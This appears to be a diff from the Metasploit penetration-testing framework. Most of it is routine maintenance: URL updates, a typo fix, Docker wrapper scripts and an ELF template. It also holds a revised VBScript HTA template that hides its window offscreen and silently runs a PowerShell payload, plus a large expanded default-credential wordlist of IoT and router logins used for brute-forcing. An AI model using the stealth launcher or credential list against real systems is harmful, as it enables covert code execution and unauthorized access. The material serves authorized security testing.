||||||
|
|
||||||
http://metasploit.com%clr
|
https://metasploit.com%clr
|
||||||
|
|
|
@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
|
||||||
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
|
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
|
||||||
```
|
```
|
||||||
|
|
||||||
Other examples of setting the RHSOTS option:
|
Other examples of setting the RHOSTS option:
|
||||||
|
|
||||||
Example 1:
|
Example 1:
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: http://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: http://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: http://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: http://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: http://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: http://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: http://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: http://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -1,8 +1,12 @@
|
||||||
<script language="VBScript">
|
<script language="VBScript">
|
||||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
window.moveTo -4000, -4000
|
||||||
|
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||||
Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
|
Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
|
||||||
If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then
|
For each path in Split(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%"),";")
|
||||||
%{var_shell}.Run "%{powershell}",0
|
If %{var_fso}.FileExists(path + "\..\powershell.exe") Then
|
||||||
End If
|
%{var_shell}.Run "%{powershell}",0
|
||||||
|
Exit For
|
||||||
|
End If
|
||||||
|
Next
|
||||||
window.close()
|
window.close()
|
||||||
</script>
|
</script>
|
||||||
|
|
|
@ -0,0 +1,41 @@
|
||||||
|
; build with:
|
||||||
|
; nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin
|
||||||
|
|
||||||
|
|
||||||
|
BITS 64
|
||||||
|
org 0
|
||||||
|
ehdr: ; Elf32_Ehdr
|
||||||
|
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
|
||||||
|
db 0, 0, 0, 0, 0, 0, 0, 0 ;
|
||||||
|
dw 2 ; e_type = ET_EXEC for an executable
|
||||||
|
dw 0xB7 ; e_machine = AARCH64
|
||||||
|
dd 0 ; e_version
|
||||||
|
dq _start ; e_entry
|
||||||
|
dq phdr - $$ ; e_phoff
|
||||||
|
dq 0 ; e_shoff
|
||||||
|
dd 0 ; e_flags
|
||||||
|
dw ehdrsize ; e_ehsize
|
||||||
|
dw phdrsize ; e_phentsize
|
||||||
|
dw 1 ; e_phnum
|
||||||
|
dw 0 ; e_shentsize
|
||||||
|
dw 0 ; e_shnum
|
||||||
|
dw 0 ; e_shstrndx
|
||||||
|
|
||||||
|
ehdrsize equ $ - ehdr
|
||||||
|
|
||||||
|
phdr: ; Elf32_Phdr
|
||||||
|
dd 1 ; p_type = PT_LOAD
|
||||||
|
dd 7 ; p_flags = rwx
|
||||||
|
dq 0 ; p_offset
|
||||||
|
dq $$ ; p_vaddr
|
||||||
|
dq $$ ; p_paddr
|
||||||
|
dq 0xDEADBEEF ; p_filesz
|
||||||
|
dq 0xDEADBEEF ; p_memsz
|
||||||
|
dq 0x1000 ; p_align
|
||||||
|
|
||||||
|
phdrsize equ $ - phdr
|
||||||
|
|
||||||
|
global _start
|
||||||
|
|
||||||
|
_start:
|
||||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -188,7 +188,7 @@
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
<div class="footer">
|
<div class="footer">
|
||||||
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
|
<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
|
||||||
</div>
|
</div>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
|
@ -195,7 +195,7 @@
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
<div class="footer">
|
<div class="footer">
|
||||||
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
|
<center><a href="https://metasploit.com/" target="_blank">metasploit.com</a></center>
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
</body>
|
</body>
|
||||||
|
|
|
@ -1,70 +1,100 @@
|
||||||
root
|
ADMINISTRATOR ADMINISTRATOR
|
||||||
|
ADMN admn
|
||||||
|
Admin admin
|
||||||
|
Administrator
|
||||||
|
Administrator 3ware
|
||||||
|
Administrator admin
|
||||||
|
Administrator changeme
|
||||||
|
Administrator ganteng
|
||||||
|
Administrator letmein
|
||||||
|
Administrator password
|
||||||
|
Administrator pilou
|
||||||
|
Administrator smcadmin
|
||||||
|
Any 12345
|
||||||
|
CSG SESAME
|
||||||
|
Cisco Cisco
|
||||||
|
D-Link D-Link
|
||||||
|
DTA TJM
|
||||||
|
GEN1 gen1
|
||||||
|
GEN2 gen2
|
||||||
|
GlobalAdmin GlobalAdmin
|
||||||
|
HTTP HTTP
|
||||||
|
IntraStack Asante
|
||||||
|
IntraSwitch Asante
|
||||||
|
JDE JDE
|
||||||
|
LUCENT01 UI-PSWD-01
|
||||||
|
LUCENT02 UI-PSWD-02
|
||||||
|
MDaemon MServer
|
||||||
|
MICRO RSX
|
||||||
|
Manager Manager
|
||||||
|
Manager friend
|
||||||
|
NAU NAU
|
||||||
|
NETWORK NETWORK
|
||||||
|
NICONEX NICONEX
|
||||||
|
PBX PBX
|
||||||
|
PFCUser 240653C9467E45
|
||||||
|
PRODDTA PRODDTA
|
||||||
|
PSEAdmin $secure$
|
||||||
|
PlcmSpIp PlcmSpIp
|
||||||
|
Polycom SpIp
|
||||||
|
RMUser1 password
|
||||||
|
SYSADM sysadm
|
||||||
|
Sweex Mysweex
|
||||||
|
USERID PASSW0RD
|
||||||
|
User Password
|
||||||
|
VNC winterm
|
||||||
|
VTech VTech
|
||||||
|
ZXDSL ZXDSL
|
||||||
|
acc acc
|
||||||
|
adfexc adfexc
|
||||||
|
adm
|
||||||
admin
|
admin
|
||||||
guest
|
|
||||||
root root
|
|
||||||
root password
|
|
||||||
root 1234
|
|
||||||
root 12345
|
|
||||||
root 123456
|
|
||||||
root 3ep5w2u
|
|
||||||
root admin
|
|
||||||
root Admin
|
|
||||||
root admin_1
|
|
||||||
root alpine
|
|
||||||
root ascend
|
|
||||||
root attack
|
|
||||||
root blender
|
|
||||||
root calvin
|
|
||||||
root changeme
|
|
||||||
root Cisco
|
|
||||||
root cms500
|
|
||||||
root davox
|
|
||||||
root default
|
|
||||||
root fivranne
|
|
||||||
root ggdaseuaimhrke
|
|
||||||
root iDirect
|
|
||||||
root letacla
|
|
||||||
root Mau'dib
|
|
||||||
root pass
|
|
||||||
root permit
|
|
||||||
root ROOT500
|
|
||||||
root tini
|
|
||||||
root tslinux
|
|
||||||
root wyse
|
|
||||||
ro ro
|
|
||||||
router router
|
|
||||||
rwa rwa
|
|
||||||
rw rw
|
|
||||||
ubnt ubnt
|
|
||||||
guest guest
|
|
||||||
guest User
|
|
||||||
admin 0
|
admin 0
|
||||||
admin 0000
|
admin 0000
|
||||||
admin 1111
|
admin 1111
|
||||||
|
admin 11111111
|
||||||
admin 123
|
admin 123
|
||||||
admin 1234
|
admin 1234
|
||||||
admin 123456
|
admin 123456
|
||||||
|
admin 1234567890
|
||||||
admin 1234admin
|
admin 1234admin
|
||||||
admin 2222
|
admin 2222
|
||||||
admin 22222
|
admin 22222
|
||||||
admin2 changeme
|
|
||||||
admin 3477
|
admin 3477
|
||||||
admin 3ascotel
|
admin 3ascotel
|
||||||
|
admin 7ujMko0admin
|
||||||
|
admin 7ujMko0vizxv
|
||||||
admin 9999
|
admin 9999
|
||||||
|
admin Admin
|
||||||
|
admin AitbISP4eCiG
|
||||||
|
admin Ascend
|
||||||
|
admin BRIDGE
|
||||||
|
admin Intel
|
||||||
|
admin MiniAP
|
||||||
|
admin NetCache
|
||||||
|
admin NetICs
|
||||||
|
admin OCS
|
||||||
|
admin P@55w0rd!
|
||||||
|
admin PASSWORD
|
||||||
|
admin Protector
|
||||||
|
admin SMDR
|
||||||
|
admin SUPER
|
||||||
|
admin Symbol
|
||||||
|
admin TANDBERG
|
||||||
|
admin _Cisco
|
||||||
admin access
|
admin access
|
||||||
admin admin
|
admin admin
|
||||||
admin Admin
|
admin admin117.35.97.74
|
||||||
Admin admin
|
|
||||||
admin admin123
|
admin admin123
|
||||||
|
admin admin1234
|
||||||
|
admin administrator
|
||||||
admin adminttd
|
admin adminttd
|
||||||
admin adslolitec
|
admin adslolitec
|
||||||
admin adslroot
|
admin adslroot
|
||||||
admin adtran
|
admin adtran
|
||||||
admin AitbISP4eCiG
|
|
||||||
admin articon
|
admin articon
|
||||||
admin asante
|
admin asante
|
||||||
admin ascend
|
admin ascend
|
||||||
admin Ascend
|
|
||||||
admin asd
|
admin asd
|
||||||
admin atc123
|
admin atc123
|
||||||
admin atlantis
|
admin atlantis
|
||||||
|
@ -72,11 +102,9 @@ admin backdoor
|
||||||
admin barricade
|
admin barricade
|
||||||
admin barricadei
|
admin barricadei
|
||||||
admin bintec
|
admin bintec
|
||||||
admin BRIDGE
|
|
||||||
admin cableroot
|
admin cableroot
|
||||||
admin changeme
|
admin changeme
|
||||||
admin cisco
|
admin cisco
|
||||||
admin _Cisco
|
|
||||||
admin comcomcom
|
admin comcomcom
|
||||||
admin conexant
|
admin conexant
|
||||||
admin default
|
admin default
|
||||||
|
@ -84,96 +112,79 @@ admin diamond
|
||||||
admin enter
|
admin enter
|
||||||
admin epicrouter
|
admin epicrouter
|
||||||
admin extendnet
|
admin extendnet
|
||||||
|
admin fliradmin
|
||||||
admin giraff
|
admin giraff
|
||||||
admin hagpolm1
|
admin hagpolm1
|
||||||
admin hello
|
admin hello
|
||||||
admin help
|
admin help
|
||||||
admin hp.com
|
admin hp.com
|
||||||
admin Intel
|
|
||||||
admin ironport
|
admin ironport
|
||||||
admin isee
|
admin isee
|
||||||
acc acc
|
admin jvc
|
||||||
adfexc adfexc
|
|
||||||
adm
|
|
||||||
admin kont2004
|
admin kont2004
|
||||||
admin letmein
|
admin letmein
|
||||||
admin leviton
|
admin leviton
|
||||||
admin linga
|
admin linga
|
||||||
|
admin meinsma
|
||||||
|
admin michaelangelo
|
||||||
admin michelangelo
|
admin michelangelo
|
||||||
admin microbusiness
|
admin microbusiness
|
||||||
admin MiniAP
|
|
||||||
admin motorola
|
admin motorola
|
||||||
admin mu
|
admin mu
|
||||||
admin my_DEMARC
|
admin my_DEMARC
|
||||||
admin netadmin
|
admin netadmin
|
||||||
admin NetCache
|
|
||||||
admin NetICs
|
|
||||||
admin noway
|
admin noway
|
||||||
admin OCS
|
admin oelinux123
|
||||||
admin operator
|
admin operator
|
||||||
admin P@55w0rd!
|
|
||||||
admin password
|
|
||||||
admin p-assword
|
admin p-assword
|
||||||
admin PASSWORD
|
admin pass
|
||||||
|
admin password
|
||||||
admin passwort
|
admin passwort
|
||||||
admin pento
|
admin pento
|
||||||
admin pfsense
|
admin pfsense
|
||||||
admin private
|
admin private
|
||||||
admin Protector
|
|
||||||
admin public
|
admin public
|
||||||
admin pwp
|
admin pwp
|
||||||
admin radius
|
admin radius
|
||||||
admin rmnetlm
|
admin rmnetlm
|
||||||
admin root
|
admin root
|
||||||
admin secure
|
admin secure
|
||||||
|
admin service
|
||||||
admin setup
|
admin setup
|
||||||
admin sitecom
|
admin sitecom
|
||||||
admin smallbusiness
|
admin smallbusiness
|
||||||
admin smcadmin
|
admin smcadmin
|
||||||
admin SMDR
|
|
||||||
admin speedxess
|
admin speedxess
|
||||||
admin SUPER
|
|
||||||
admin superuser
|
admin superuser
|
||||||
|
admin support
|
||||||
admin switch
|
admin switch
|
||||||
admin Symbol
|
|
||||||
admin synnet
|
admin synnet
|
||||||
admin sysAdmin
|
admin sysAdmin
|
||||||
admin system
|
admin system
|
||||||
admin TANDBERG
|
admin tech
|
||||||
|
admin ubnt
|
||||||
admin visual
|
admin visual
|
||||||
admin w2402
|
admin w2402
|
||||||
admin xad$|#12
|
admin wbox
|
||||||
admin xad$l#12
|
admin xad$l#12
|
||||||
|
admin xad$|#12
|
||||||
admin zoomadsl
|
admin zoomadsl
|
||||||
system change_on_install
|
admin2 changeme
|
||||||
system/manager sys/change_on_install
|
administrator administrator
|
||||||
system password
|
administrator changeme
|
||||||
system sys
|
adminstat OCS
|
||||||
|
adminstrator changeme
|
||||||
adminttd adminttd
|
adminttd adminttd
|
||||||
adminuser OCS
|
adminuser OCS
|
||||||
adminview OCS
|
adminview OCS
|
||||||
adminstat OCS
|
alpine alpine
|
||||||
adminstrator changeme
|
|
||||||
Administrator 3ware
|
|
||||||
Administrator admin
|
|
||||||
administrator administrator
|
|
||||||
ADMINISTRATOR ADMINISTRATOR
|
|
||||||
administrator changeme
|
|
||||||
Administrator changeme
|
|
||||||
Administrator ganteng
|
|
||||||
Administrator letmein
|
|
||||||
Administrator password
|
|
||||||
Administrator pilou
|
|
||||||
Administrator smcadmin
|
|
||||||
ADMN admn
|
|
||||||
ami
|
ami
|
||||||
anonymous any@
|
|
||||||
anonymous Exabyte
|
anonymous Exabyte
|
||||||
Any 12345
|
anonymous any@
|
||||||
apc apc
|
apc apc
|
||||||
at4400 at4400
|
at4400 at4400
|
||||||
bbsd-client changeme2
|
|
||||||
bbsd-client NULL
|
bbsd-client NULL
|
||||||
|
bbsd-client changeme2
|
||||||
bciim bciimpw
|
bciim bciimpw
|
||||||
bcim bcimpw
|
bcim bcimpw
|
||||||
bcms bcmspw
|
bcms bcmspw
|
||||||
|
@ -191,7 +202,6 @@ cellit cellit
|
||||||
cgadmin cgadmin
|
cgadmin cgadmin
|
||||||
cisco
|
cisco
|
||||||
cisco cisco
|
cisco cisco
|
||||||
Cisco Cisco
|
|
||||||
citel citel
|
citel citel
|
||||||
client client
|
client client
|
||||||
cmaker cmaker
|
cmaker cmaker
|
||||||
|
@ -201,15 +211,19 @@ craft
|
||||||
craft craft
|
craft craft
|
||||||
craft craftpw
|
craft craftpw
|
||||||
craft crftpw
|
craft crftpw
|
||||||
CSG SESAME
|
|
||||||
cusadmin highspeed
|
cusadmin highspeed
|
||||||
cust custpw
|
cust custpw
|
||||||
customer
|
customer
|
||||||
customer none
|
customer none
|
||||||
dadmin dadmin01
|
dadmin dadmin01
|
||||||
|
daemon
|
||||||
davox davox
|
davox davox
|
||||||
debug d.e.b.u.g
|
debug d.e.b.u.g
|
||||||
debug synnet
|
debug synnet
|
||||||
|
default
|
||||||
|
default antslq
|
||||||
|
default default
|
||||||
|
default password
|
||||||
deskalt password
|
deskalt password
|
||||||
deskman changeme
|
deskman changeme
|
||||||
desknorm password
|
desknorm password
|
||||||
|
@ -220,41 +234,39 @@ dhs3pms dhs3pms
|
||||||
diag danger
|
diag danger
|
||||||
diag switch
|
diag switch
|
||||||
disttech 4tas
|
disttech 4tas
|
||||||
D-Link D-Link
|
|
||||||
draytek 1234
|
draytek 1234
|
||||||
DTA TJM
|
|
||||||
e250 e250changeme
|
e250 e250changeme
|
||||||
e500 e500changeme
|
e500 e500changeme
|
||||||
echo echo
|
|
||||||
echo User
|
echo User
|
||||||
|
echo echo
|
||||||
enable
|
enable
|
||||||
eng engineer
|
eng engineer
|
||||||
enquiry enquirypw
|
enquiry enquirypw
|
||||||
field support
|
field support
|
||||||
GEN1 gen1
|
guest
|
||||||
GEN2 gen2
|
guest 1111
|
||||||
GlobalAdmin GlobalAdmin
|
guest 12345
|
||||||
|
guest 123456
|
||||||
|
guest User
|
||||||
|
guest guest
|
||||||
|
guest xc3511
|
||||||
halt tlah
|
halt tlah
|
||||||
helpdesk OCS
|
helpdesk OCS
|
||||||
hsa hsadb
|
hsa hsadb
|
||||||
hscroot abc123
|
hscroot abc123
|
||||||
HTTP HTTP
|
|
||||||
hydrasna
|
hydrasna
|
||||||
iclock timely
|
iclock timely
|
||||||
images images
|
images images
|
||||||
inads inads
|
inads inads
|
||||||
inads indspw
|
inads indspw
|
||||||
init initpw
|
init initpw
|
||||||
installer installer
|
|
||||||
install llatsni
|
install llatsni
|
||||||
install secret
|
install secret
|
||||||
|
installer installer
|
||||||
intel intel
|
intel intel
|
||||||
intermec intermec
|
intermec intermec
|
||||||
intermec intermec1QTPS
|
intermec intermec1QTPS
|
||||||
IntraStack Asante
|
|
||||||
IntraSwitch Asante
|
|
||||||
jagadmin
|
jagadmin
|
||||||
JDE JDE
|
|
||||||
kermit kermit
|
kermit kermit
|
||||||
l2 l2
|
l2 l2
|
||||||
l3 l3
|
l3 l3
|
||||||
|
@ -266,8 +278,6 @@ login access
|
||||||
login admin
|
login admin
|
||||||
login password
|
login password
|
||||||
lp lp
|
lp lp
|
||||||
LUCENT01 UI-PSWD-01
|
|
||||||
LUCENT02 UI-PSWD-02
|
|
||||||
m1122 m1122
|
m1122 m1122
|
||||||
mac
|
mac
|
||||||
maint maint
|
maint maint
|
||||||
|
@ -278,50 +288,41 @@ manage !manage
|
||||||
manager admin
|
manager admin
|
||||||
manager change_on_install
|
manager change_on_install
|
||||||
manager friend
|
manager friend
|
||||||
Manager friend
|
|
||||||
manager manager
|
manager manager
|
||||||
Manager Manager
|
|
||||||
manager sys
|
manager sys
|
||||||
manuf xxyyzz
|
manuf xxyyzz
|
||||||
MDaemon MServer
|
|
||||||
mediator mediator
|
mediator mediator
|
||||||
MICRO RSX
|
mg3500 merlin
|
||||||
mlusr mlusr
|
mlusr mlusr
|
||||||
monitor monitor
|
monitor monitor
|
||||||
|
mother fucker
|
||||||
mtch mtch
|
mtch mtch
|
||||||
mtcl
|
mtcl
|
||||||
mtcl mtcl
|
mtcl mtcl
|
||||||
naadmin naadmin
|
naadmin naadmin
|
||||||
NAU NAU
|
|
||||||
netangr attack
|
netangr attack
|
||||||
netman
|
netman
|
||||||
netman netman
|
netman netman
|
||||||
netopia netopia
|
netopia netopia
|
||||||
netrangr attack
|
netrangr attack
|
||||||
netscreen netscreen
|
netscreen netscreen
|
||||||
NETWORK NETWORK
|
|
||||||
NICONEX NICONEX
|
|
||||||
nms nmspw
|
nms nmspw
|
||||||
nokai nokai
|
nokai nokai
|
||||||
nokia nokia
|
nokia nokia
|
||||||
none 0
|
none 0
|
||||||
none admin
|
none admin
|
||||||
operator
|
|
||||||
operator 1234
|
|
||||||
operator $chwarzepumpe
|
|
||||||
operator operator
|
|
||||||
op op
|
op op
|
||||||
op operator
|
op operator
|
||||||
|
operator
|
||||||
|
operator $chwarzepumpe
|
||||||
|
operator 1234
|
||||||
|
operator operator
|
||||||
|
oracle oracle
|
||||||
patrol patrol
|
patrol patrol
|
||||||
PBX PBX
|
|
||||||
PFCUser 240653C9467E45
|
|
||||||
piranha piranha
|
piranha piranha
|
||||||
piranha q
|
piranha q
|
||||||
pmd
|
pmd
|
||||||
poll tech
|
poll tech
|
||||||
Polycom SpIp
|
|
||||||
PRODDTA PRODDTA
|
|
||||||
PSEAdmin $secure$
|
|
||||||
public
|
public
|
||||||
public public
|
public public
|
||||||
radware radware
|
radware radware
|
||||||
|
@ -331,7 +332,89 @@ readonly lucenttech2
|
||||||
readwrite lucenttech1
|
readwrite lucenttech1
|
||||||
recovery recovery
|
recovery recovery
|
||||||
replicator replicator
|
replicator replicator
|
||||||
RMUser1 password
|
ro ro
|
||||||
|
root
|
||||||
|
root 000000
|
||||||
|
root 1111
|
||||||
|
root 1234
|
||||||
|
root 12345
|
||||||
|
root 123456
|
||||||
|
root 1234567890
|
||||||
|
root 1234qwer
|
||||||
|
root 123qwe
|
||||||
|
root 1q2w3e4r5
|
||||||
|
root 3ep5w2u
|
||||||
|
root 54321
|
||||||
|
root 666666
|
||||||
|
root 7ujMko0admin
|
||||||
|
root 7ujMko0vizxv
|
||||||
|
root 888888
|
||||||
|
root Admin
|
||||||
|
root Cisco
|
||||||
|
root GMB182
|
||||||
|
root LSiuY7pOmZG2s
|
||||||
|
root Mau'dib
|
||||||
|
root PASSWORD
|
||||||
|
root ROOT500
|
||||||
|
root Serv4EMC
|
||||||
|
root Zte521
|
||||||
|
root abc123
|
||||||
|
root admin
|
||||||
|
root admin1234
|
||||||
|
root admin_1
|
||||||
|
root ahetzip8
|
||||||
|
root alpine
|
||||||
|
root anko
|
||||||
|
root antslq
|
||||||
|
root ascend
|
||||||
|
root attack
|
||||||
|
root avtech
|
||||||
|
root b120root
|
||||||
|
root bananapi
|
||||||
|
root blender
|
||||||
|
root calvin
|
||||||
|
root changeme
|
||||||
|
root cms500
|
||||||
|
root comcom
|
||||||
|
root coolphoenix579
|
||||||
|
root davox
|
||||||
|
root default
|
||||||
|
root dreambox
|
||||||
|
root fivranne
|
||||||
|
root ggdaseuaimhrke
|
||||||
|
root hi3518
|
||||||
|
root iDirect
|
||||||
|
root ikwb
|
||||||
|
root ikwd
|
||||||
|
root jauntech
|
||||||
|
root juantech
|
||||||
|
root jvbzd
|
||||||
|
root klv123
|
||||||
|
root klv1234
|
||||||
|
root letacla
|
||||||
|
root maxided
|
||||||
|
root oelinux123
|
||||||
|
root openssh
|
||||||
|
root openvpnas
|
||||||
|
root orion99
|
||||||
|
root pa55w0rd
|
||||||
|
root pass
|
||||||
|
root password
|
||||||
|
root permit
|
||||||
|
root realtek
|
||||||
|
root root
|
||||||
|
root tini
|
||||||
|
root tslinux
|
||||||
|
root user
|
||||||
|
root vizxv
|
||||||
|
root wyse
|
||||||
|
root xc3511
|
||||||
|
root xmhdipc
|
||||||
|
root zlxx.
|
||||||
|
root zte9x15
|
||||||
|
router router
|
||||||
|
rw rw
|
||||||
|
rwa rwa
|
||||||
sa
|
sa
|
||||||
scmadmin scmchangeme
|
scmadmin scmchangeme
|
||||||
scout scout
|
scout scout
|
||||||
|
@ -346,44 +429,55 @@ smc smcadmin
|
||||||
spcl 0
|
spcl 0
|
||||||
storwatch specialist
|
storwatch specialist
|
||||||
stratacom stratauser
|
stratacom stratauser
|
||||||
|
su super
|
||||||
super 5777364
|
super 5777364
|
||||||
|
super super
|
||||||
|
super surt
|
||||||
|
super.super
|
||||||
|
super.super master
|
||||||
superadmin secret
|
superadmin secret
|
||||||
superman 21241036
|
superman 21241036
|
||||||
superman talent
|
superman talent
|
||||||
super super
|
|
||||||
super.super
|
|
||||||
super.super master
|
|
||||||
super surt
|
|
||||||
superuser
|
superuser
|
||||||
superuser 123456
|
superuser 123456
|
||||||
superuser admin
|
superuser admin
|
||||||
supervisor PlsChgMe!
|
supervisor PlsChgMe!
|
||||||
supervisor PlsChgMe1
|
supervisor PlsChgMe1
|
||||||
supervisor supervisor
|
supervisor supervisor
|
||||||
|
supervisor zyad1234
|
||||||
|
support 123
|
||||||
|
support 1234
|
||||||
|
support 12345
|
||||||
|
support 123456
|
||||||
|
support admin
|
||||||
support h179350
|
support h179350
|
||||||
|
support login
|
||||||
support support
|
support support
|
||||||
support supportpw
|
support supportpw
|
||||||
su super
|
support zlxx.
|
||||||
Sweex Mysweex
|
sys uplink
|
||||||
sysadm Admin
|
sysadm Admin
|
||||||
|
sysadm PASS
|
||||||
sysadm anicust
|
sysadm anicust
|
||||||
|
sysadm sysadm
|
||||||
sysadmin PASS
|
sysadmin PASS
|
||||||
sysadmin password
|
sysadmin password
|
||||||
sysadmin sysadmin
|
sysadmin sysadmin
|
||||||
sysadm PASS
|
system change_on_install
|
||||||
sysadm sysadm
|
system password
|
||||||
SYSADM sysadm
|
system sys
|
||||||
sys uplink
|
system/manager sys/change_on_install
|
||||||
target password
|
target password
|
||||||
teacher password
|
teacher password
|
||||||
tech
|
tech
|
||||||
tech ANYCOM
|
tech ANYCOM
|
||||||
tech field
|
|
||||||
tech ILMI
|
tech ILMI
|
||||||
|
tech field
|
||||||
tech tech
|
tech tech
|
||||||
telco telco
|
telco telco
|
||||||
telecom telecom
|
telecom telecom
|
||||||
tellabs tellabs#1
|
tellabs tellabs#1
|
||||||
|
telnet telnet
|
||||||
temp1 password
|
temp1 password
|
||||||
test test
|
test test
|
||||||
tiara tiaranet
|
tiara tiaranet
|
||||||
|
@ -391,19 +485,17 @@ tiger tiger123
|
||||||
topicalt password
|
topicalt password
|
||||||
topicnorm password
|
topicnorm password
|
||||||
topicres password
|
topicres password
|
||||||
|
ubnt ubnt
|
||||||
user
|
user
|
||||||
USERID PASSW0RD
|
user 123456
|
||||||
user pass
|
user pass
|
||||||
user password
|
user password
|
||||||
User Password
|
|
||||||
user public
|
user public
|
||||||
user tivonpw
|
user tivonpw
|
||||||
user user
|
user user
|
||||||
vcr NetVCR
|
vcr NetVCR
|
||||||
VNC winterm
|
|
||||||
volition volition
|
volition volition
|
||||||
vt100 public
|
vt100 public
|
||||||
VTech VTech
|
|
||||||
webadmin 1234
|
webadmin 1234
|
||||||
webadmin webadmin
|
webadmin webadmin
|
||||||
websecadm changeme
|
websecadm changeme
|
||||||
|
@ -412,4 +504,3 @@ wradmin trancell
|
||||||
write private
|
write private
|
||||||
xd xd
|
xd xd
|
||||||
xxx cascade
|
xxx cascade
|
||||||
ZXDSL ZXDSL
|
|
||||||
|
|
|
@ -4,7 +4,7 @@ services:
|
||||||
image: metasploit
|
image: metasploit
|
||||||
build:
|
build:
|
||||||
context: .
|
context: .
|
||||||
dockerfile: ./docker/Dockerfile
|
dockerfile: ./Dockerfile
|
||||||
environment:
|
environment:
|
||||||
DATABASE_URL: postgres://postgres@db:5432/msf
|
DATABASE_URL: postgres://postgres@db:5432/msf
|
||||||
links:
|
links:
|
||||||
|
|
|
@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
|
||||||
MSF_PATH=$(dirname $(dirname $path))
|
MSF_PATH=$(dirname $(dirname $path))
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
if [[ -n "$MSF_BUILD" ]]; then
|
||||||
|
docker-compose -f $MSF_PATH/docker-compose.yml build
|
||||||
|
fi
|
||||||
|
|
||||||
cd $MSF_PATH
|
cd $MSF_PATH
|
||||||
docker-compose run --rm --service-ports ms ./msfvenom "$@"
|
docker-compose run --rm --service-ports ms ./msfvenom "$@"
|
||||||
|
|
|
@ -0,0 +1,26 @@
|
||||||
|
#! /bin/bash
|
||||||
|
|
||||||
|
if [[ -z "$MSF_PATH" ]]; then
|
||||||
|
path=`dirname $0`
|
||||||
|
|
||||||
|
# check for ./docker/msfconsole.rc
|
||||||
|
if [[ ! -f $path/../msfconsole.rc ]] ; then
|
||||||
|
|
||||||
|
# we are not inside the project
|
||||||
|
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
|
||||||
|
|
||||||
|
# determine script path
|
||||||
|
pushd $(dirname $(realpath $0)) > /dev/null
|
||||||
|
path=$(pwd)
|
||||||
|
popd > /dev/null
|
||||||
|
fi
|
||||||
|
MSF_PATH=$(dirname $(dirname $path))
|
||||||
|
fi
|
||||||
|
|
||||||
|
cd $MSF_PATH
|
||||||
|
|
||||||
|
if [[ -n "$MSF_BUILD" ]]; then
|
||||||
|
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
|
||||||
|
fi
|
||||||
|
|
||||||
|
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"
|
|
